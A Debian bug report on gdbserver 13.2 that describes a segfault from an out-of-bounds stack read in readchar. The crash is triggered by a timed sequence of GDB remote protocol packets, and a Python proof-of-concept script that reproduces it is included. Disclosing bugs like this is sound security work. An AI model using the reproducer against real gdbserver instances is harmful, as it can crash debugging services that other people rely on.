Package: gdbserver
Version: 13.2-1
Severity: important
X-Debbugs-Cc: research.mnt...@gmail.com
Dear Maintainer,
During a debug session with IDAPro 7.7 in conjunction with gdbserver, I
encountered a crash while IDA was trying to reconnect to the remote debugger. I
reproduced exactly all the “GDB serial Protocol” commands that I sent to
gdbserver using a python script and the only error I got was SIGPIPE. I noticed
that adding a sleep between the commands resulted in the same crash mentioned
above.
After a little bit of trial and error I found that the combinantion of commands
resulting in SEGFAULT was: “+” -> (sleep one second after the response) ->
“QStartNoAckMode” -> (sleep one second after the response) --> "%" (sleep one
second ) --> SEGFAULT
I was running gdbserver in my local network using "gdbserver localhost:23946
~/Desktop/whar", the version of gdbserver is GNU gdbserver (Debian 13.2-1) 13.2
and gdbserver was configured as "x86_64-linux-gnu"
Usually if the commands are not sent with the right timing the only error
raised is SIGPIPE and the program keeps running.
I found out that there is a read out of bound during the call of the readchar
(gdbserver/remote-utils.cc:847). The variable readchar_bufcnt is decremented
leading to a backward stack read out of bound causing a SEGMENTATION FAULT
I have no clue why the program bypasses the cheks and starts to read the stack.
This is the python script I used to crash the program:
import binascii
import socket
import struct
import sys
import time
def checksum(s: str) -> str:
res = sum(map(ord, s)) % 256
return f'{res:2x}'
def ack(sock):
sock.send(b'+')
def send(sock, s: str) -> str:
if s != '+':
sock.send(f'${s}#{checksum(s)}'.encode())
res = sock.recv(1024)
else:
ack(sock)
res = '_'
return res
def main():
ip = '192.168.1.13'
port = '23946'
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.connect((ip,int(port)))
res = send(sock,"QStartNoAckMode")
print(res)
time.sleep(1)
res = send(sock,"qXfer:threads:read::0,47fe")
print(res)
time.sleep(1)
res = send(sock,"%")
print(res)
time.sleep(1)
if __name__ == '__main__':
main()
-- System Information:
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2023.3
Codename: kali-rolling
Architecture: x86_64
Kernel: Linux 5.10.0-kali3-amd64 (SMP w/2 CPU threads)
Kernel taint flags: TAINT_UNSIGNED_MODULE
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages gdbserver depends on:
ii libc6 2.37-6
ii libgcc-s1 13.1.0-6
ii libstdc++6 13.1.0-6
gdbserver recommends no packages.
gdbserver suggests no packages.
-- no debconf information
